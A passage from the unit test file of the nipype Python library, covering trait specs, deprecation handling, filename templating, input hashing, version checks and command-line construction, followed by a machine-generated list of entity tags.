nib.traits.Int(xor=_xor_inputs, + desc='foo or bar, not both') + bar = nib.traits.Int(xor=_xor_inputs, + desc='bar or foo, not both') + kung = nib.traits.Float(requires=('foo',), + position=0, + desc='kung foo') + + class out3(nib.TraitedSpec): + output = nib.traits.Int + + class MyInterface(nib.BaseInterface): + input_spec = spec3 + output_spec = out3 + + myif = MyInterface() + yield assert_raises, TypeError, setattr(myif.inputs, 'kung', 10.0) + myif.inputs.foo = 1 + yield assert_equal, myif.inputs.foo, 1 + set_bar = lambda: setattr(myif.inputs, 'bar', 1) + yield assert_raises, IOError, set_bar + yield assert_equal, myif.inputs.foo, 1 + myif.inputs.kung = 2 + yield assert_equal, myif.inputs.kung, 2.0 + + +def test_deprecation(): + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec1(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='0.1') + spec_instance = DeprecationSpec1() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec1numeric(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='0.1') + spec_instance = DeprecationSpec1numeric() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec2(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='100', new_name='bar') + spec_instance = DeprecationSpec2() + set_foo = lambda: setattr(spec_instance, 'foo', 1) + yield assert_raises, nib.TraitError, set_foo + yield assert_equal, len(w), 0, 'no warnings, just errors' + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec3(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='1000', new_name='bar') + bar = nib.traits.Int() + spec_instance = DeprecationSpec3() + not_raised = True + try: + spec_instance.foo = 1 + except nib.TraitError: + not_raised = False + yield assert_true, not_raised + yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w] + + with warnings.catch_warnings(record=True) as w: + warnings.filterwarnings('always', '', UserWarning) + + class DeprecationSpec3(nib.TraitedSpec): + foo = nib.traits.Int(deprecated='1000', new_name='bar') + bar = nib.traits.Int() + spec_instance = DeprecationSpec3() + not_raised = True + try: + spec_instance.foo = 1 + except nib.TraitError: + not_raised = False + yield assert_true, not_raised + yield assert_equal, spec_instance.foo, Undefined + yield assert_equal, spec_instance.bar, 1 + yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w] + + +def test_namesource(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec2(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=2) + doo = nib.File(exists=True, argstr=""%s"", position=1) + goo = traits.Int(argstr=""%d"", position=4) + poo = nib.File(name_source=['goo'], hash_files=False, argstr=""%s"", position=3) + + class TestName(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec2 + testobj = TestName() + 
testobj.inputs.doo = tmp_infile + testobj.inputs.goo = 99 + yield assert_true, '%s_generated' % nme in testobj.cmdline + testobj.inputs.moo = ""my_%s_template"" + yield assert_true, 'my_%s_template' % nme in testobj.cmdline + os.chdir(pwd) + teardown_file(tmpd) + + +def test_chained_namesource(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec2(nib.CommandLineInputSpec): + doo = nib.File(exists=True, argstr=""%s"", position=1) + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=2, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=3) + + class TestName(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec2 + + testobj = TestName() + testobj.inputs.doo = tmp_infile + res = testobj.cmdline + yield assert_true, '%s' % tmp_infile in res + yield assert_true, '%s_mootpl ' % nme in res + yield assert_true, '%s_mootpl_generated' % nme in res + + os.chdir(pwd) + teardown_file(tmpd) + + +def test_cycle_namesource1(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec3(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=1, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=2) + doo = nib.File(name_source=['poo'], hash_files=False, + argstr=""%s"", position=3) + + class TestCycle(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec3 + + # Check that an exception is raised + to0 = TestCycle() + not_raised = True + try: + to0.cmdline + except nib.NipypeInterfaceError: + not_raised = False + yield assert_false, not_raised + + os.chdir(pwd) + teardown_file(tmpd) + + +def test_cycle_namesource2(): + tmp_infile = setup_file() + tmpd, nme, ext = split_filename(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + + class spec3(nib.CommandLineInputSpec): + moo = nib.File(name_source=['doo'], hash_files=False, argstr=""%s"", + position=1, name_template='%s_mootpl') + poo = nib.File(name_source=['moo'], hash_files=False, + argstr=""%s"", position=2) + doo = nib.File(name_source=['poo'], hash_files=False, + argstr=""%s"", position=3) + + class TestCycle(nib.CommandLine): + _cmd = ""mycommand"" + input_spec = spec3 + + # Check that loop can be broken by setting one of the inputs + to1 = TestCycle() + to1.inputs.poo = tmp_infile + + not_raised = True + try: + res = to1.cmdline + except nib.NipypeInterfaceError: + not_raised = False + print(res) + + yield assert_true, not_raised + yield assert_true, '%s' % tmp_infile in res + yield assert_true, '%s_generated' % nme in res + yield assert_true, '%s_generated_mootpl' % nme in res + + os.chdir(pwd) + teardown_file(tmpd) + + +def checknose(): + """"""check version of nose for known incompatability"""""" + mod = __import__('nose') + if mod.__versioninfo__[1] <= 11: + return 0 + else: + return 1 + + +@skipif(checknose) +def test_TraitedSpec_withFile(): + tmp_infile = setup_file() + tmpd, nme = os.path.split(tmp_infile) + yield assert_true, os.path.exists(tmp_infile) + + class spec2(nib.TraitedSpec): + moo = nib.File(exists=True) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec2(moo=tmp_infile, doo=[tmp_infile]) + hashval = infields.get_hashval(hash_method='content') + yield assert_equal, hashval[1], 'PI:KEY' + teardown_file(tmpd) + + +@skipif(checknose) +def test_TraitedSpec_withNoFileHashing(): 
+ tmp_infile = setup_file() + tmpd, nme = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + yield assert_true, os.path.exists(tmp_infile) + + class spec2(nib.TraitedSpec): + moo = nib.File(exists=True, hash_files=False) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec2(moo=nme, doo=[tmp_infile]) + hashval = infields.get_hashval(hash_method='content') + yield assert_equal, hashval[1], 'PI:KEY' + + class spec3(nib.TraitedSpec): + moo = nib.File(exists=True, name_source=""doo"") + doo = nib.traits.List(nib.File(exists=True)) + infields = spec3(moo=nme, doo=[tmp_infile]) + hashval1 = infields.get_hashval(hash_method='content') + + class spec4(nib.TraitedSpec): + moo = nib.File(exists=True) + doo = nib.traits.List(nib.File(exists=True)) + infields = spec4(moo=nme, doo=[tmp_infile]) + hashval2 = infields.get_hashval(hash_method='content') + + yield assert_not_equal, hashval1[1], hashval2[1] + os.chdir(pwd) + teardown_file(tmpd) + + +def test_Interface(): + yield assert_equal, nib.Interface.input_spec, None + yield assert_equal, nib.Interface.output_spec, None + yield assert_raises, NotImplementedError, nib.Interface + yield assert_raises, NotImplementedError, nib.Interface.help + yield assert_raises, NotImplementedError, nib.Interface._inputs_help + yield assert_raises, NotImplementedError, nib.Interface._outputs_help + yield assert_raises, NotImplementedError, nib.Interface._outputs + + class DerivedInterface(nib.Interface): + def __init__(self): + pass + + nif = DerivedInterface() + yield assert_raises, NotImplementedError, nif.run + yield assert_raises, NotImplementedError, nif.aggregate_outputs + yield assert_raises, NotImplementedError, nif._list_outputs + yield assert_raises, NotImplementedError, nif._get_filecopy_info + + +def test_BaseInterface(): + yield assert_equal, nib.BaseInterface.help(), None + yield assert_equal, nib.BaseInterface._get_filecopy_info(), [] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + goo = nib.traits.Int(desc='a random int', mandatory=True) + moo = nib.traits.Int(desc='a random int', mandatory=False) + hoo = nib.traits.Int(desc='a random int', usedefault=True) + zoo = nib.File(desc='a file', copyfile=False) + woo = nib.File(desc='a file', copyfile=True) + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class DerivedInterface(nib.BaseInterface): + input_spec = InputSpec + + yield assert_equal, DerivedInterface.help(), None + yield assert_true, 'moo' in ''.join(DerivedInterface._inputs_help()) + yield assert_equal, DerivedInterface()._outputs(), None + yield assert_equal, DerivedInterface._get_filecopy_info()[0]['key'], 'woo' + yield assert_true, DerivedInterface._get_filecopy_info()[0]['copy'] + yield assert_equal, DerivedInterface._get_filecopy_info()[1]['key'], 'zoo' + yield assert_false, DerivedInterface._get_filecopy_info()[1]['copy'] + yield assert_equal, DerivedInterface().inputs.foo, Undefined + yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs + yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None + yield assert_raises, ValueError, DerivedInterface().run + yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run + + class DerivedInterface2(DerivedInterface): + output_spec = OutputSpec + + def _run_interface(self, runtime): + return runtime + + yield assert_equal, DerivedInterface2.help(), None + yield assert_equal, DerivedInterface2()._outputs().foo, Undefined + yield assert_raises, 
NotImplementedError, DerivedInterface2(goo=1).run + + nib.BaseInterface.input_spec = None + yield assert_raises, Exception, nib.BaseInterface + +def test_BaseInterface_load_save_inputs(): + tmp_dir = tempfile.mkdtemp() + tmp_json = os.path.join(tmp_dir, 'settings.json') + + class InputSpec(nib.TraitedSpec): + input1 = nib.traits.Int() + input2 = nib.traits.Float() + input3 = nib.traits.Bool() + input4 = nib.traits.Str() + + class DerivedInterface(nib.BaseInterface): + input_spec = InputSpec + + def __init__(self, **inputs): + super(DerivedInterface, self).__init__(**inputs) + + inputs_dict = {'input1': 12, 'input3': True, + 'input4': 'some string'} + bif = DerivedInterface(**inputs_dict) + bif.save_inputs_to_json(tmp_json) + bif2 = DerivedInterface() + bif2.load_inputs_from_json(tmp_json) + yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict + + bif3 = DerivedInterface(from_file=tmp_json) + yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict + + inputs_dict2 = inputs_dict.copy() + inputs_dict2.update({'input4': 'some other string'}) + bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2['input4']) + yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2 + + bif5 = DerivedInterface(input4=inputs_dict2['input4']) + bif5.load_inputs_from_json(tmp_json, overwrite=False) + yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2 + + bif6 = DerivedInterface(input4=inputs_dict2['input4']) + bif6.load_inputs_from_json(tmp_json) + yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict + + # test get hashval in a complex interface + from nipype.interfaces.ants import Registration + settings = example_data(example_data('smri_ants_registration_settings.json')) + with open(settings) as setf: + data_dict = json.load(setf) + + tsthash = Registration() + tsthash.load_inputs_from_json(settings) + yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree()) + + tsthash2 = Registration(from_file=settings) + yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree()) + + _, hashvalue = tsthash.inputs.get_hashval(hash_method='timestamp') + yield assert_equal, 'ec5755e07287e04a4b409e03b77a517c', hashvalue + +def test_input_version(): + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + obj = DerivedInterface1() + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + config.set('execution', 'stop_on_unknown_version', True) + yield assert_raises, Exception, obj._check_version_requirements, obj.inputs + + config.set_default_config() + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.8' + obj = DerivedInterface1() + obj.inputs.foo = 1 + yield assert_raises, Exception, obj._check_version_requirements + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.9' + obj = DerivedInterface1() + obj.inputs.foo = 1 + not_raised = True + yield 
assert_not_raises, obj._check_version_requirements, obj.inputs + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', max_ver='0.7') + + class DerivedInterface2(nib.BaseInterface): + input_spec = InputSpec + _version = '0.8' + obj = DerivedInterface2() + obj.inputs.foo = 1 + yield assert_raises, Exception, obj._check_version_requirements + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', max_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + _version = '0.9' + obj = DerivedInterface1() + obj.inputs.foo = 1 + not_raised = True + yield assert_not_raises, obj._check_version_requirements, obj.inputs + + +def test_output_version(): + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.9') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_equal, obj._check_version_requirements(obj._outputs()), [] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.11') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + obj = DerivedInterface1() + yield assert_equal, obj._check_version_requirements(obj._outputs()), ['foo'] + + class InputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int') + + class OutputSpec(nib.TraitedSpec): + foo = nib.traits.Int(desc='a random int', min_ver='0.11') + + class DerivedInterface1(nib.BaseInterface): + input_spec = InputSpec + output_spec = OutputSpec + _version = '0.10' + + def _run_interface(self, runtime): + return runtime + + def _list_outputs(self): + return {'foo': 1} + obj = DerivedInterface1() + yield assert_raises, KeyError, obj.run + + +def test_Commandline(): + yield assert_raises, Exception, nib.CommandLine + ci = nib.CommandLine(command='which') + yield assert_equal, ci.cmd, 'which' + yield assert_equal, ci.inputs.args, Undefined + ci2 = nib.CommandLine(command='which', args='ls') + yield assert_equal, ci2.cmdline, 'which ls' + ci3 = nib.CommandLine(command='echo') + ci3.inputs.environ = {'MYENV': 'foo'} + res = ci3.run() + yield assert_equal, res.runtime.environ['MYENV'], 'foo' + yield assert_equal, res.outputs, None + + class CommandLineInputSpec1(nib.CommandLineInputSpec): + foo = nib.Str(argstr='%s', desc='a str') + goo = nib.traits.Bool(argstr='-g', desc='a bool', position=0) + hoo = nib.traits.List(argstr='-l %s', desc='a list') + moo = nib.traits.List(argstr='-i %d...', desc='a repeated list', + position=-1) + noo = nib.traits.Int(argstr='-x %d', desc='an int') + roo = nib.traits.Str(desc='not on command line') + soo = nib.traits.Bool(argstr=""-soo"") + nib.CommandLine.input_spec = CommandLineInputSpec1 + ci4 = nib.CommandLine(command='cmd') + ci4.inputs.foo = 'foo' + ci4.inputs.goo = True + ci4.inputs.hoo = ['a', 'b'] + ci4.inputs.moo = [1, 2, 3] + ci4.inputs.noo = 0 + ci4.inputs.roo = 'hello' + ci4.inputs.soo = False + cmd = ci4._parse_inputs() + yield assert_equal, cmd[0], '-g' + yield assert_equal, cmd[-1], '-i 1 -i 2 -i 3' + yield assert_true, 'hello' not in ' '.join(cmd) + yield assert_true, '-soo' not in ' '.join(cmd) + ci4.inputs.soo = True + cmd = ci4._parse_inputs() + yield assert_true, '-soo' in ' '.join(cmd) + + class 
CommandLineInputSpec2(nib.CommandLineInputSpec): + foo = nib.File(argstr='%s', desc='a str', genfile=True) + nib.CommandLine.input_spec = CommandLineInputSpec2 + ci5 = nib.CommandLine(command='cmd') + yield assert_raises, NotImplementedError, ci5._parse_inputs + + class DerivedClass(nib.CommandLine): + input_spec = CommandLineInputSpec2 + + def _gen_filename(self, name): + return 'filename' + + ci6 = DerivedClass(command='cmd') + yield assert_equal, ci6._parse_inputs()[0], 'filename' + nib.CommandLine.input_spec = nib.CommandLineInputSpec + + +def test_Commandline_environ(): + from nipype import config + config.set_default_config() + ci3 = nib.CommandLine(command='echo') + res = ci3.run() + yield assert_equal, res.runtime.environ['DISPLAY'], ':1' + config.set('execution', 'display_variable', ':3') + res = ci3.run() + yield assert_false, 'DISPLAY' in ci3.inputs.environ + yield assert_equal, res.runtime.environ['DISPLAY'], ':3' + ci3.inputs.environ = {'DISPLAY': ':2'} + res = ci3.run() + yield assert_equal, res.runtime.environ['DISPLAY'], ':2' + + +def test_CommandLine_output(): + tmp_infile = setup_file() + tmpd, name = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + yield assert_true, os.path.exists(tmp_infile) + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'allatonce' + res = ci.run() + yield assert_equal, res.runtime.merged, '' + yield assert_true, name in res.runtime.stdout + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'file' + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + yield assert_true, isinstance(res.runtime.stdout, (str, bytes)) + ci = nib.CommandLine(command='ls -l') + ci.inputs.terminal_output = 'none' + res = ci.run() + yield assert_equal, res.runtime.stdout, '' + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + os.chdir(pwd) + teardown_file(tmpd) + + +def test_global_CommandLine_output(): + tmp_infile = setup_file() + tmpd, name = os.path.split(tmp_infile) + pwd = os.getcwd() + os.chdir(tmpd) + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, name in res.runtime.stdout + yield assert_true, os.path.exists(tmp_infile) + nib.CommandLine.set_default_terminal_output('allatonce') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_equal, res.runtime.merged, '' + yield assert_true, name in res.runtime.stdout + nib.CommandLine.set_default_terminal_output('file') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_true, 'stdout.nipype' in res.runtime.stdout + nib.CommandLine.set_default_terminal_output('none') + ci = nib.CommandLine(command='ls -l') + res = ci.run() + yield assert_equal, res.runtime.stdout, '' + os.chdir(pwd) + teardown_file(tmpd) + +def assert_not_raises(fn, *args, **kwargs): + fn(*args, **kwargs) + return True + +def check_dict(ref_dict, tst_dict): + """"""Compare dictionaries of inputs and and those loaded from json files"""""" + def to_list(x): + if isinstance(x, tuple): + x = list(x) + + if isinstance(x, list): + for i, xel in enumerate(x): + x[i] = to_list(xel) + + return x + + failed_dict = {} + for key, value in list(ref_dict.items()): + newval = to_list(tst_dict[key]) + if newval != value: + failed_dict[key] = (value, newval) + return failed_dict + +",26974,"[['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 
'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', ""desc='bar""], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', ""desc='a""], ['LOCATION', ""desc='an""], ['PERSON', 'roo = nib.traits'], ['PERSON', ""ci6 = DerivedClass(command='cmd'""], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], 
['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], 
